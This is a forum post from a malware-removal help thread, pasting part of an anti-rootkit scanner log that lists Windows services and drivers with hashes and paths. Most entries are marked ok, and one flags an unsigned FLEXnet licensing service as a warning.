15:33:34.0032 0x04bc  DfsC - ok
15:33:34.0079 0x04bc  [ 6D7E8A022DB7DAD500789CBA5C2EF005, FBD3710CDD3690A104486E36FB5A85CFF07D350B99C8302272702D4019E09FC0 ] Dhcp            C:\Windows\system32\dhcpcore.dll
15:33:34.0118 0x04bc  Dhcp - ok
15:33:34.0138 0x04bc  [ 13096B05847EC78F0977F2C0F79E9AB3, 1E44981B684F3E56F5D2439BB7FA78BD1BC876BB2265AE089AEC68F241B05B26 ] discache        C:\Windows\system32\drivers\discache.sys
15:33:34.0173 0x04bc  discache - ok
15:33:34.0194 0x04bc  [ 9819EEE8B5EA3784EC4AF3B137A5244C, 571BC886E87C888DA96282E381A746D273B58B9074E84D4CA91275E26056D427 ] Disk            C:\Windows\system32\drivers\disk.sys
15:33:34.0202 0x04bc  Disk - ok
15:33:34.0216 0x04bc  [ 5DB085A8A6600BE6401F2B24EECB5415, 5FC5C7C1B4DB7BF6EFD0992E91DB41FD047E90D1ABA0B8F868CB72557F88FB13 ] dmvsc           C:\Windows\system32\drivers\dmvsc.sys
15:33:34.0241 0x04bc  dmvsc - ok
15:33:34.0270 0x04bc  [ 16835866AAA693C7D7FCEBA8FFF706E4, 15891558F7C1F2BB57A98769601D447ED0D952354A8BB347312D034DC03E0242 ] Dnscache        C:\Windows\System32\dnsrslvr.dll
15:33:34.0288 0x04bc  Dnscache - ok
15:33:34.0310 0x04bc  [ 8DA62036CC6192959D675142A3084916, BA97989D8E047872C54BC517697366741AFBB483906185EDED67C7C5854FCB4F ] dot3svc         C:\Windows\System32\dot3svc.dll
15:33:34.0348 0x04bc  dot3svc - ok
15:33:34.0385 0x04bc  [ B26F4F737E8F9DF4F31AF6CF31D05820, 394BBBED4EC7FAD4110F62A43BFE0801D4AC56FFAC6C741C69407B26402311C7 ] DPS             C:\Windows\system32\dps.dll
15:33:34.0420 0x04bc  DPS - ok
15:33:34.0448 0x04bc  [ 9B19F34400D24DF84C858A421C205754, 967AF267B4124BADA8F507CEBF25F2192D146A4D63BE71B45BFC03C5DA7F21A7 ] drmkaud         C:\Windows\system32\drivers\drmkaud.sys
15:33:34.0478 0x04bc  drmkaud - ok
15:33:34.0516 0x04bc  [ 87CE5C8965E101CCCED1F4675557E868, 077D98F0F130B2FC710208BA34016EF2B2506EE2BD71740B228145E34A3046F1 ] DXGKrnl         C:\Windows\System32\drivers\dxgkrnl.sys
15:33:34.0536 0x04bc  DXGKrnl - ok
15:33:34.0557 0x04bc  [ 60633132A929C09FE78FAB16541F9E71, C7B60A4AAD8E0D9519D819A417D8A51383BF1DF571E5EF5A98A693DB0A8E0BE7 ] e1cexpress      C:\Windows\system32\DRIVERS\e1c62x64.sys
15:33:34.0567 0x04bc  e1cexpress - ok
15:33:34.0602 0x04bc  [ 60C5B36E07BE8B3AF3911C3D10303CFE, AD34AC7BD929AF1864768156E7C0FA2997E9EB44EB8DEAEB160EB55A082C2C5A ] e1kexpress      C:\Windows\system32\DRIVERS\e1k62x64.sys
15:33:34.0613 0x04bc  e1kexpress - ok
15:33:34.0634 0x04bc  [ E2DDA8726DA9CB5B2C4000C9018A9633, 0C967DBC3636A76A696997192A158AA92A1AF19F01E3C66D5BF91818A8FAEA76 ] EapHost         C:\Windows\System32\eapsvc.dll
15:33:34.0668 0x04bc  EapHost - ok
15:33:34.0738 0x04bc  [ DC5D737F51BE844D8C82C695EB17372F, 6D4022D9A46EDE89CEF0FAEADCC94C903234DFC460C0180D24FF9E38E8853017 ] ebdrv           C:\Windows\system32\drivers\evbda.sys
15:33:34.0847 0x04bc  ebdrv - ok
15:33:34.0899 0x04bc  [ 03E1B8BA59327D186C7C533A6998FEF9, 224937A697B55BD9CCD790771DBE9D135021AD1DC3E6D6AC7C431C56F0FFBBB5 ] eeCtrl          C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys
15:33:34.0912 0x04bc  eeCtrl - ok
15:33:34.0936 0x04bc  [ 204F3F58212B3E422C90BD9691A2DF28, D748A8CEE4D59B4248C9B1ACA5155D0FF6635A29564B4391B7FAC6261F93FE99 ] EFS             C:\Windows\System32\lsass.exe
15:33:34.0959 0x04bc  EFS - ok
15:33:35.0009 0x04bc  [ C4002B6B41975F057D98C439030CEA07, 3D2484FBB832EFB90504DD406ED1CF3065139B1FE1646471811F3A5679EF75F1 ] ehRecvr         C:\Windows\ehome\ehRecvr.exe
15:33:35.0040 0x04bc  ehRecvr - ok
15:33:35.0044 0x04bc  [ 4705E8EF9934482C5BB488CE28AFC681, 359E9EC5693CE0BE89082E1D5D8F5C5439A5B985010FF0CB45C11E3CFE30637D ] ehSched         C:\Windows\ehome\ehsched.exe
15:33:35.0054 0x04bc  ehSched - ok
15:33:35.0082 0x04bc  [ 0E5DA5369A0FCAEA12456DD852545184, 9A64AC5396F978C3B92794EDCE84DCA938E4662868250F8C18FA7C2C172233F8 ] elxstor         C:\Windows\system32\drivers\elxstor.sys
15:33:35.0097 0x04bc  elxstor - ok
15:33:35.0130 0x04bc  [ 142EA7DF1851C563571F2DCFC7AFBB40, 14DE008B68D127F246A64290DFCBD7ECDE8FF7932B3BAE660EB131860E826EAD ] EraserUtilRebootDrv C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys
15:33:35.0138 0x04bc  EraserUtilRebootDrv - ok
15:33:35.0149 0x04bc  [ 34A3C54752046E79A126E15C51DB409B, 7D5B5E150C7C73666F99CBAFF759029716C86F16B927E0078D77F8A696616D75 ] ErrDev          C:\Windows\system32\drivers\errdev.sys
15:33:35.0157 0x04bc  ErrDev - ok
15:33:35.0187 0x04bc  [ 4166F82BE4D24938977DD1746BE9B8A0, 24121751B7306225AD1C808442D7B030DEF377E9316AA0A3C5C7460E87317881 ] EventSystem     C:\Windows\system32\es.dll
15:33:35.0224 0x04bc  EventSystem - ok
15:33:35.0244 0x04bc  [ A510C654EC00C1E9BDD91EEB3A59823B, 76CD277730F7B08D375770CD373D786160F34D1481AF0536BA1A5D2727E255F5 ] exfat           C:\Windows\system32\drivers\exfat.sys
15:33:35.0269 0x04bc  exfat - ok
15:33:35.0289 0x04bc  [ 0ADC83218B66A6DB380C330836F3E36D, 798D6F83B5DBCC1656595E0A96CF12087FCCBE19D1982890D0CE5F629B328B29 ] fastfat         C:\Windows\system32\drivers\fastfat.sys
15:33:35.0324 0x04bc  fastfat - ok
15:33:35.0359 0x04bc  [ DBEFD454F8318A0EF691FDD2EAAB44EB, 7F52AE222FF28503B6FC4A5852BD0CAEAF187BE69AF4B577D3DE474C24366099 ] Fax             C:\Windows\system32\fxssvc.exe
15:33:35.0404 0x04bc  Fax - ok
15:33:35.0420 0x04bc  [ D765D19CD8EF61F650C384F62FAC00AB, 9F0A483A043D3BA873232AD3BA5F7BF9173832550A27AF3E8BD433905BD2A0EE ] fdc             C:\Windows\system32\drivers\fdc.sys
15:33:35.0436 0x04bc  fdc - ok
15:33:35.0453 0x04bc  [ 0438CAB2E03F4FB61455A7956026FE86, 6D4DDC2973DB25CE0C7646BC85EFBCC004EBE35EA683F62162AE317C6F1D8DFE ] fdPHost         C:\Windows\system32\fdPHost.dll
15:33:35.0485 0x04bc  fdPHost - ok
15:33:35.0502 0x04bc  [ 802496CB59A30349F9A6DD22D6947644, 52D59D3D628D5661F83F090F33F744F6916E0CC1F76E5A33983E06EB66AE19F8 ] FDResPub        C:\Windows\system32\fdrespub.dll
15:33:35.0523 0x04bc  FDResPub - ok
15:33:35.0537 0x04bc  [ 655661BE46B5F5F3FD454E2C3095B930, 549C8E2A2A37757E560D55FFA6BFDD838205F17E40561E67F0124C934272CD1A ] FileInfo        C:\Windows\system32\drivers\fileinfo.sys
15:33:35.0546 0x04bc  FileInfo - ok
15:33:35.0555 0x04bc  [ 5F671AB5BC87EEA04EC38A6CD5962A47, 6B61D3363FF3F9C439BD51102C284972EAE96ACC0683B9DC7E12D25D0ADC51B6 ] Filetrace       C:\Windows\system32\drivers\filetrace.sys
15:33:35.0594 0x04bc  Filetrace - ok
15:33:35.0637 0x04bc  [ F76D04F7413B07DAA029F6520B64B4E8, 3EB13C0EFE737880853FB8952381E7A57723F9472E0E4ED7CDA8A0D7DE8DC90D ] FLEXnet Licensing Service C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
15:33:35.0677 0x04bc  FLEXnet Licensing Service - detected UnsignedFile.Multi.Generic ( 1 )
15:33:35.0677 0x04bc  FLEXnet Licensing Service ( UnsignedFile.Multi.Generic ) - warning
15:33:35.0698 0x04bc  [ C172A0F53008EAEB8EA33FE10E177AF5, 9175A95B323696D1B35C9EFEB7790DD64E6EE0B7021E6C18E2F81009B169D77B ] flpydisk        C:\Windows\system32\drivers\flpydisk.sys
15:33:35.0707 0x04bc  flpydisk - ok
15:33:35.0729 0x04bc  [ DA6B67270FD9DB3697B20FCE94950741, F621A4462C9F2904063578C427FAF22D7D66AE9967605C11C798099817CE5331 ] FltMgr          C:\Windows\system32\drivers\fltmgr.sys
15:33:35.0739 0x04bc  FltMgr - ok
15:33:35.0783 0x04bc  [ C4C183E6551084039EC862DA1C945E3D, 0874A2ACDD24D64965AA9A76E9C818E216880AE4C9A2E07ED932EE404585CEE6 ] FontCache       C:\Windows\system32\FntCache.dll
15:33:35.0828 0x04bc  FontCache - ok
15:33:35.0856 0x04bc  [ A8B7F3818AB65695E3A0BB3279F6DCE6, 89FCF10F599767E67A1E011753E34DA44EAA311F105DBF69549009ED932A60F0 ] FontCache3.0.0.0 C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
15:33:35.0863 0x04bc  FontCache3.0.0.0 - ok
15:33:35.0876 0x04bc  [ D43703496149971890703B4B1B723EAC, F06397B2EDCA61629249D2EF1CBB7827A8BEAB8488246BD85EF6AE1363C0DA6E ] FsDepends       C:\Windows\system32\drivers\FsDepends.sys
15:33:35.0884 0x04bc  FsDepends - ok
15:33:35.0890 0x04bc  [ 6BD9295CC032DD3077C671FCCF579A7B, 83622FBB0CB923798E7E584BF53CAAF75B8C016E3FF7F0FA35880FF34D1DFE33 ] Fs_Rec          C:\Windows\system32\drivers\Fs_Rec.sys
15:33:35.0897 0x04bc  Fs_Rec - ok
15:33:35.0923 0x04bc  [ 8F6322049018354F45F05A2FD2D4E5E0, 73BF0FB4EBD7887E992DDEBB79E906958D6678F8D1107E8C368F5A0514D80359 ] fvevol          C:\Windows\system32\DRIVERS\fvevol.sys
15:33:35.0935 0x04bc  fvevol - ok
15:33:35.0950 0x04bc  [ 8C778D335C9D272CFD3298AB02ABE3B6, 85F0B13926B0F693FA9E70AA58DE47100E4B6F893772EBE4300C37D9A36E6005 ] gagp30kx        C:\Windows\system32\drivers\gagp30kx.sys
15:33:35.0958 0x04bc  gagp30kx - ok
15:33:35.0992 0x04bc  [ 8E98D21EE06192492A5671A6144D092F, B8F656B34D361EA5AFB47F3A67AB2221580DADA59C8CD0CB83181E4AD8B562B4 ] GEARAspiWDM     C:\Windows\system32\DRIVERS\GEARAspiWDM.sys
15:33:35.0998 0x04bc  GEARAspiWDM - ok
15:33:36.0019 0x04bc  [ 030B778F4272DF185E4E2E8EC49D162E, 702E884DC9C56D67A250F2DE4C293A878054F0F0A3BB64944A204445D9D5357F ] gpsvc           C:\Windows\System32\gpsvc.dll
15:33:36.0053 0x04bc  gpsvc - ok
15:33:36.0083 0x04bc  [ 51508F0C2476177E50C31B0BBFBF1BDB, 3F62A05181D54711180C8727AC66D624AFA7FC816A4ACC4DC0CFCF2D2DBE7F87 ] gupdate         C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
15:33:36.0090 0x04bc  gupdate - ok
15:33:36.0103 0x04bc  [ 51508F0C2476177E50C31B0BBFBF1BDB, 3F62A05181D54711180C8727AC66D624AFA7FC816A4ACC4DC0CFCF2D2DBE7F87 ] gupdatem        C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
15:33:36.0110 0x04bc  gupdatem - ok
15:33:36.0140 0x04bc  [ F2523EF6460FC42405B12248338AB2F0, B2F3DE8DE1F512D871BC2BC2E8D0E33AB03335BFBC07627C5F88B65024928E19 ] hcw85cir        C:\Windows\system32\drivers\hcw85cir.sys
15:33:36.0176 0x04bc  hcw85cir - ok
15:33:36.0204 0x04bc  [ 975761C778E33CD22498059B91E7373A, 8304E15FBE6876BE57263A03621365DA8C88005EAC532A770303C06799D915D9 ] HdAudAddService C:\Windows\system32\drivers\HdAudio.sys
15:33:36.0235 0x04bc  HdAudAddService - ok
15:33:36.0261 0x04bc  [ 97BFED39B6B79EB12CDDBFEED51F56BB, 3CF981D668FB2381E52AF2E51E296C6CFB47B0D62249645278479D0111A47955 ] HDAudBus        C:\Windows\system32\DRIVERS\HDAudBus.sys
15:33:36.0282 0x04bc  HDAudBus - ok
15:33:36.0284 0x04bc  [ 78E86380454A7B10A5EB255DC44A355F, 11F3ED7ACFFA3024B9BD504F81AC39F5B4CED5A8A425E8BADF7132EFEDB9BD64 ] HidBatt         C:\Windows\system32\drivers\HidBatt.sys
15:33:36.0298 0x04bc  HidBatt - ok
15:33:36.0302 0x04bc  [ 7FD2A313F7AFE5C4DAB14798C48DD104, 94CBFD4506CBDE4162CEB3367BAB042D19ACA6785954DC0B554D4164B9FCD0D4 ] HidBth          C:\Windows\system32\drivers\hidbth.sys
15:33:36.0323 0x04bc  HidBth - ok
15:33:36.0339 0x04bc  [ 0A77D29F311B88CFAE3B13F9C1A73825, 8615DC6CEFB591505CE16E054A71A4F371B827DDFD5E980777AB4233DCFDA01D ] HidIr           C:\Windows\system32\drivers\hidir.sys
15:33:36.0349 0x04bc  HidIr - ok
15:33:36.0375 0x04bc  [ BD9EB3958F213F96B97B1D897DEE006D, 4D01CBF898B528B3A4E5A683DF2177300AFABD7D4CB51F1A7891B1B545499631 ] hidserv         C:\Windows\system32\hidserv.dll
15:33:36.0410 0x04bc  hidserv - ok
15:33:36.0427 0x04bc  [ 9592090A7E2B61CD582B612B6DF70536, FD11D5E02C32D658B28FCC35688AB66CCB5D3A0A0D74C82AE0F0B6C67B568A0F ] HidUsb          C:\Windows\system32\DRIVERS\hidusb.sys
15:33:36.0448 0x04bc  HidUsb - ok
15:33:36.0476 0x04bc  [ 387E72E739E15E3D37907A86D9FF98E2, 9935BE2E58788E79328293AF2F202CB0F6042441B176F75ACC5AEA93C8E05531 ] hkmsvc          C:\Windows\system32\kmsvc.dll
15:33:36.0511 0x04bc  hkmsvc - ok
15:33:36.0535 0x04bc  [ EFDFB3DD38A4376F93E7985173813ABD, 70402FA73A5A2A8BB557AAC8F531E373077D28DE5F40A1F3F14B940BE01CD2E1 ] HomeGroupListener C:\Windows\system32\ListSvc.dll
15:33:36.0565 0x04bc  HomeGroupListener - ok
15:33:36.0583 0x04bc  [ 908ACB1F594274965A53926B10C81E89, 7D34A742AC486294D82676F8465A3EF26C8AC3317C32B63F62031CB007CFC208 ] HomeGroupProvider C:\Windows\system32\provsvc.dll
15:33:36.0604 0x04bc  HomeGroupProvider - ok
15:33:36.0627 0x04bc  [ 39D2ABCD392F3D8A6DCE7B60AE7B8EFC, E9E6A1665740CFBC2DD321010007EF42ABA2102AEB9772EE8AA3354664B1E205 ] HpSAMD          C:\Windows\system32\drivers\HpSAMD.sys
15:33:36.0635 0x04bc  HpSAMD - ok
15:33:36.0664 0x04bc  [ 0EA7DE1ACB728DD5A369FD742D6EEE28, 21C489412EB33A12B22290EB701C19BA57006E8702E76F730954F0784DDE9779 ] HTTP            C:\Windows\system32\drivers\HTTP.sys
15:33:36.0709 0x04bc  HTTP - ok



#11 Shate'

Shate'
  • Topic Starter

  • Members
  • 72 posts
  • OFFLINE
  •  
  • Local time:03:41 PM

Posted 06 November 2014 - 03:47 PM

15:33:36.0722 0x04bc  [ A5462BD6884960C9DC85ED49D34FF392, 53E65841AF5B06A2844D0BB6FC4DD3923A323FFA0E4BFC89B3B5CAFB592A3D53 ] hwpolicy        C:\Windows\system32\drivers\hwpolicy.sys
15:33:36.0730 0x04bc  hwpolicy - ok
15:33:36.0750 0x04bc  [ FA55C73D4AFFA7EE23AC4BE53B4592D3, 65CDDC62B89A60E942C5642C9D8B539EFB69DA8069B4A2E54978154B314531CD ] i8042prt        C:\Windows\system32\drivers\i8042prt.sys
15:33:36.0760 0x04bc  i8042prt - ok
15:33:36.0828 0x04bc  [ C224331A54571C8C9162F7714400BBBD, C2CA4881ACD46071E67435BE5E3DB133D0743B026FD20D6D6E26B2FE7A03FCAA ] iaStor          C:\Windows\system32\DRIVERS\iaStor.sys
15:33:36.0842 0x04bc  iaStor - ok
15:33:36.0884 0x04bc  [ 7D4B9A48430ED57ACA6373B71D5904CA, 6ED72DAA7A4951142F036364E8F237E74246EF3E9EA089448DEF15380DAB0DB3 ] IAStorDataMgrSvc C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
15:33:36.0890 0x04bc  IAStorDataMgrSvc - ok
15:33:36.0921 0x04bc  [ AAAF44DB3BD0B9D1FB6969B23ECC8366, 805AA4A9464002D1AB3832E4106B2AAA1331F4281367E75956062AAE99699385 ] iaStorV         C:\Windows\system32\drivers\iaStorV.sys
15:33:36.0935 0x04bc  iaStorV - ok
15:33:36.0991 0x04bc  [ C98A5B9D932430AD8EEBD3EF73756EF7, DF7E1D391A0F3345AD61154363922C27BD557DEEACE395A6A8A8A16BFD1BB9A8 ] idsvc           C:\Windows\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\infocard.exe
15:33:37.0015 0x04bc  idsvc - ok
15:33:37.0096 0x04bc  [ 47D561365913893120FC651419745FDA, B1D61C40A2EA1CF2440FF8C154C085600B2E6B68F4376B4D33B5AC1E87D9181E ] IDSVia64        C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\IPSDefs\20141105.011\IDSvia64.sys
15:33:37.0110 0x04bc  IDSVia64 - ok
15:33:37.0373 0x04bc  [ 0D1B8C64BDF0E5CDC523A1409FFB5EF0, 92F264325C3B1F70E0ACDBC886F7DC4C32371759EA94CE359B0FABD89573DCA4 ] igfx            C:\Windows\system32\DRIVERS\igdkmd64.sys
15:33:37.0713 0x04bc  igfx - ok
15:33:37.0718 0x04bc  [ 5C18831C61933628F5BB0EA2675B9D21, 5CD9DE2F8C0256623A417B5C55BF55BB2562BD7AB2C3C83BB3D9886C2FBDA4E4 ] iirsp           C:\Windows\system32\drivers\iirsp.sys
15:33:37.0725 0x04bc  iirsp - ok
15:33:37.0754 0x04bc  [ 1E2A51DB8B28CD431D2B5C76A71AAEE3, A356E381C155DF7D3E905696D63A652D1C01D524B6B866C2288ECC5F3B3D4AB9 ] IKEEXT          C:\Windows\System32\ikeext.dll
15:33:37.0785 0x04bc  IKEEXT - ok
15:33:37.0884 0x04bc  [ 392FC7BC8144D0072335AF1F69BDCE9D, 614D3523B24F2963718D196222099E6BD25338D8F126CA5F5D7A1D593F5510AA ] IntcAzAudAddService C:\Windows\system32\drivers\RTDVHD64.sys
15:33:37.0944 0x04bc  IntcAzAudAddService - ok
15:33:38.0072 0x04bc  [ B353F1834FCD36D77BE3F74992C147D4, BFBC42B500FC7D6D2B523F988DD54156D2B6132CBE366EB591BF45556959A8E9 ] Intel® Capability Licensing Service Interface c:\Program Files\Intel\iCLS Client\HeciServer.exe
15:33:38.0088 0x04bc  Intel® Capability Licensing Service Interface - ok
15:33:38.0133 0x04bc  [ F00F20E70C6EC3AA366910083A0518AA, E2F3E9FFD82C802C8BAC309893A3664ACF16A279959C0FDECCA64C3D3C60FD22 ] intelide        C:\Windows\system32\drivers\intelide.sys
15:33:38.0148 0x04bc  intelide - ok
15:33:38.0178 0x04bc  [ ADA036632C664CAA754079041CF1F8C1, F2386CC09AC6DE4C54189154F7D91C1DB7AA120B13FAE8BA5B579ACF99FCC610 ] intelppm        C:\Windows\system32\DRIVERS\intelppm.sys
15:33:38.0202 0x04bc  intelppm - ok
15:33:38.0217 0x04bc  [ 098A91C54546A3B878DAD6A7E90A455B, 044CCE2A0DF56EBE1EFD99B4F6F0A5B9EE12498CA358CF4B2E3A1CFD872823AA ] IPBusEnum       C:\Windows\system32\ipbusenum.dll
15:33:38.0249 0x04bc  IPBusEnum - ok
15:33:38.0260 0x04bc  [ C9F0E1BD74365A8771590E9008D22AB6, 728BC5A6AAE499FDC50EB01577AF16D83C2A9F3B09936DD2A89C01E074BA8E51 ] IpFilterDriver  C:\Windows\system32\DRIVERS\ipfltdrv.sys
15:33:38.0281 0x04bc  IpFilterDriver - ok
15:33:38.0330 0x04bc  [ 08C2957BB30058E663720C5606885653, E13EDF6701512E2A9977A531454932CA5023087CB50E1D2F416B8BCDD92B67BE ] iphlpsvc        C:\Windows\System32\iphlpsvc.dll
15:33:38.0357 0x04bc  iphlpsvc - ok
15:33:38.0360 0x04bc  [ 0FC1AEA580957AA8817B8F305D18CA3A, 7161E4DE91AAFC3FA8BF24FAE4636390C2627DB931505247C0D52C75A31473D9 ] IPMIDRV         C:\Windows\system32\drivers\IPMIDrv.sys
15:33:38.0383 0x04bc  IPMIDRV - ok
15:33:38.0403 0x04bc  [ AF9B39A7E7B6CAA203B3862582E9F2D0, 67128BE7EADBE6BD0205B050F96E268948E8660C4BAB259FB0BE03935153D04E ] IPNAT           C:\Windows\system32\drivers\ipnat.sys
15:33:38.0442 0x04bc  IPNAT - ok
15:33:38.0482 0x04bc  [ 7FAE5B6CDB18B0B2E81F32869F595022, D873A7EE94749E1700E8F6B8BB7B485AE1B0B83388D63BE06335720498D4794F ] iPod Service    C:\Program Files\iPod\bin\iPodService.exe
15:33:38.0496 0x04bc  iPod Service - ok
15:33:38.0512 0x04bc  [ 3ABF5E7213EB28966D55D58B515D5CE9, A352BCC5B6B9A28805B15CAFB235676F1FAFF0D2394F88C03089EB157D6188AE ] IRENUM          C:\Windows\system32\drivers\irenum.sys
15:33:38.0523 0x04bc  IRENUM - ok
15:33:38.0535 0x04bc  [ 2F7B28DC3E1183E5EB418DF55C204F38, D40410A760965925D6F10959B2043F7BD4F68EAFCF5E743AF11AD860BD136548 ] isapnp          C:\Windows\system32\drivers\isapnp.sys
15:33:38.0543 0x04bc  isapnp - ok
15:33:38.0577 0x04bc  [ 96BB922A0981BC7432C8CF52B5410FE6, 236C05509B1040059B15021CBBDBDAF3B9C0F00910142BE5887B2C7561BAAFBA ] iScsiPrt        C:\Windows\system32\drivers\msiscsi.sys
15:33:38.0588 0x04bc  iScsiPrt - ok
15:33:38.0632 0x04bc  [ C8A3C909F0EFF13CAE0C17503B1F5DB2, 48B83C625AD4FFF4B8D92C70FEFDE70354C18193A8DDFE6D716776228FF691D5 ] iusb3hcs        C:\Windows\system32\DRIVERS\iusb3hcs.sys
15:33:38.0640 0x04bc  iusb3hcs - ok
15:33:38.0674 0x04bc  [ BB47E889BA2ADB7D1A438F9824F5899B, CE074B540154501C2B77A11BD27996D652BA3C81B7CBD2E8DF2E57B3DF770517 ] iusb3hub        C:\Windows\system32\DRIVERS\iusb3hub.sys
15:33:38.0686 0x04bc  iusb3hub - ok
15:33:38.0740 0x04bc  [ 7971B368F36042A0EC31FEA15945187B, E5EDD32316549644708DFD84ECC899C12C5095A16A607ACE0E23A9F49DCCC0BC ] iusb3xhc        C:\Windows\system32\DRIVERS\iusb3xhc.sys
15:33:38.0757 0x04bc  iusb3xhc - ok
15:33:38.0785 0x04bc  [ 5B7DE9D87B9D2713BDD6A53678DC2A49, E7A0D68FA2ED2730640F40FF59338BE173C8973BFC38286E6320CA332A39C204 ] jhi_service     C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe
15:33:38.0793 0x04bc  jhi_service - ok
15:33:38.0814 0x04bc  [ BC02336F1CBA7DCC7D1213BB588A68A5, 450C5BAD54CCE2AFCDFF1B6E7F8E1A8446D9D3255DF9D36C29A8F848048AAD93 ] kbdclass        C:\Windows\system32\DRIVERS\kbdclass.sys
15:33:38.0822 0x04bc  kbdclass - ok
15:33:38.0850 0x04bc  [ 0705EFF5B42A9DB58548EEC3B26BB484, 86C6824ED7ED6FA8F306DB6319A0FD688AA91295AE571262F9D8E96A32225E99 ] kbdhid          C:\Windows\system32\DRIVERS\kbdhid.sys
15:33:38.0868 0x04bc  kbdhid - ok
15:33:38.0878 0x04bc  [ 204F3F58212B3E422C90BD9691A2DF28, D748A8CEE4D59B4248C9B1ACA5155D0FF6635A29564B4391B7FAC6261F93FE99 ] KeyIso          C:\Windows\system32\lsass.exe
15:33:38.0886 0x04bc  KeyIso - ok
15:33:38.0907 0x04bc  [ 353009DEDF918B2A51414F330CF72DEC, BF157D6E329F26E02FA16271B751B421396040DBB1D7BF9B2E0A21BC569672E2 ] KSecDD          C:\Windows\system32\Drivers\ksecdd.sys
15:33:38.0915 0x04bc  KSecDD - ok
15:33:38.0930 0x04bc  [ 1C2D8E18AA8FD50CD04C15CC27F7F5AB, 4BA3B0F9F01BD47D66091D3AD86B69A523981D61DFB4D677F2CD39405B2DA989 ] KSecPkg         C:\Windows\system32\Drivers\ksecpkg.sys
15:33:38.0940 0x04bc  KSecPkg - ok
15:33:38.0950 0x04bc  [ 6869281E78CB31A43E969F06B57347C4, 866A23E69B32A78D378D6CB3B3DA3695FFDFF0FEC3C9F68C8C3F988DF417044B ] ksthunk         C:\Windows\system32\drivers\ksthunk.sys
15:33:38.0978 0x04bc  ksthunk - ok
15:33:39.0010 0x04bc  [ 6AB66E16AA859232F64DEB66887A8C9C, 5F2B579BEA8098A2994B0DECECDAE7B396E7B5DC5F09645737B9F28BEEA77FFF ] KtmRm           C:\Windows\system32\msdtckrm.dll
15:33:39.0051 0x04bc  KtmRm - ok
15:33:39.0082 0x04bc  [ 5CE3ADEF1C7203DCC0467E084ACE5643, E8A26479F296451310D42215E3E280C80A18BD6E537A854D1702873AC4162382 ] LanmanServer    C:\Windows\system32\srvsvc.dll
15:33:39.0094 0x04bc  LanmanServer - ok
15:33:39.0129 0x04bc  [ 851A1382EED3E3A7476DB004F4EE3E1A, B1C67F47DD594D092E6E258F01DF5E7150227CE3131A908A244DEE9F8A1FABF9 ] LanmanWorkstation C:\Windows\System32\wkssvc.dll
15:33:39.0165 0x04bc  LanmanWorkstation - ok
15:33:39.0202 0x04bc  [ 1538831CF8AD2979A04C423779465827, E1729B0CC4CEEE494A0B8817A8E98FF232E3A32FB023566EF0BC71A090262C0C ] lltdio          C:\Windows\system32\DRIVERS\lltdio.sys
15:33:39.0235 0x04bc  lltdio - ok
15:33:39.0273 0x04bc  [ C1185803384AB3FEED115F79F109427F, 0414FE73532DCAB17E906438A14711E928CECCD5F579255410C62984DD652700 ] lltdsvc         C:\Windows\System32\lltdsvc.dll
15:33:39.0314 0x04bc  lltdsvc - ok
15:33:39.0361 0x04bc  [ F993A32249B66C9D622EA5592A8B76B8, EE64672A990C6145DC5601E2B8CDBE089272A72732F59AF9865DCBA8B1717E70 ] lmhosts         C:\Windows\System32\lmhsvc.dll
15:33:39.0383 0x04bc  lmhosts - ok
15:33:39.0429 0x04bc  [ E70FD0D2C95F559A17321D831875593D, 57839ADA7CC6606D98B43FC2F4EC6F5E9B75A2F3EC937C11322201128A161E0D ] LMS             C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
15:33:39.0439 0x04bc  LMS - ok
15:33:39.0467 0x04bc  [ 1A93E54EB0ECE102495A51266DCDB6A6, DB6AA86AA36C3A7988BE96E87B5D3251BE7617C54EE8F894D9DC2E267FE3255B ] LSI_FC          C:\Windows\system32\drivers\lsi_fc.sys
15:33:39.0476 0x04bc  LSI_FC - ok
15:33:39.0489 0x04bc  [ 1047184A9FDC8BDBFF857175875EE810, F2251EDB7736A26D388A0C5CC2FE5FB9C5E109CBB1E3800993554CB21D81AE4B ] LSI_SAS         C:\Windows\system32\drivers\lsi_sas.sys
15:33:39.0497 0x04bc  LSI_SAS - ok
15:33:39.0500 0x04bc  [ 30F5C0DE1EE8B5BC9306C1F0E4A75F93, 88D5740A4E9CC3FA80FA18035DAB441BDC5A039622D666BFDAA525CC9686BD06 ] LSI_SAS2        C:\Windows\system32\drivers\lsi_sas2.sys
15:33:39.0508 0x04bc  LSI_SAS2 - ok
15:33:39.0512 0x04bc  [ 0504EACAFF0D3C8AED161C4B0D369D4A, 4D272237C189646F5C80822FD3CBA7C2728E482E2DAAF7A09C8AEF811C89C54D ] LSI_SCSI        C:\Windows\system32\drivers\lsi_scsi.sys
15:33:39.0521 0x04bc  LSI_SCSI - ok
15:33:39.0541 0x04bc  [ 43D0F98E1D56CCDDB0D5254CFF7B356E, 5BA498183B5C4996C694CB0A9A6B66CE6C7A460F6C91BEB9F305486FCC3B7B22 ] luafv           C:\Windows\system32\drivers\luafv.sys
15:33:39.0572 0x04bc  luafv - ok
15:33:39.0596 0x04bc  [ 0BE09CD858ABF9DF6ED259D57A1A1663, 2FD28889B93C8E801F74C1D0769673A461671E0189D0A22C94509E3F0EEB7428 ] Mcx2Svc         C:\Windows\system32\Mcx2Svc.dll
15:33:39.0607 0x04bc  Mcx2Svc - ok
15:33:39.0618 0x04bc  [ A55805F747C6EDB6A9080D7C633BD0F4, 2DA0E83BF3C8ADEF6F551B6CC1C0A3F6149CDBE6EC60413BA1767C4DE425A728 ] megasas         C:\Windows\system32\drivers\megasas.sys
15:33:39.0626 0x04bc  megasas - ok
15:33:39.0640 0x04bc  [ BAF74CE0072480C3B6B7C13B2A94D6B3, 85CBB4949C090A904464F79713A3418338753D20D7FB811E68F287FDAC1DD834 ] MegaSR          C:\Windows\system32\drivers\MegaSR.sys
15:33:39.0652 0x04bc  MegaSR - ok
